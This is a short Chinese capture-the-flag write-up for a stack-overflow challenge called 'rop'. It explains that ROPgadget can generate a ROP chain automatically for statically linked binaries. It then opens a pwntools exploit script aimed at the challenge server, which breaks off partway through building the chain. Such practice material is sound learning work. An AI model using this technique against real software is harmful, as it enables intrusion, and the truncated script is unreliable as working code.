ROP

很明显的栈溢出,想了半天没有头绪,然后发现可以用ROPgadget –binary rop –ropchain 直接生成rop链(简直太舒服了,静态链接的elf貌似都可以这么做)

ROP_第1张图片

exp(前两行换了顺序就会报错,坑了我好久):

from pwn import *
from struct import pack

#io = process('./rop')
io = remote('hackme.inndy.tw',7704)

# Padding goes here
p = 'a'*0xc + 'aaaa'

p += pack('

你可能感兴趣的:(ROP)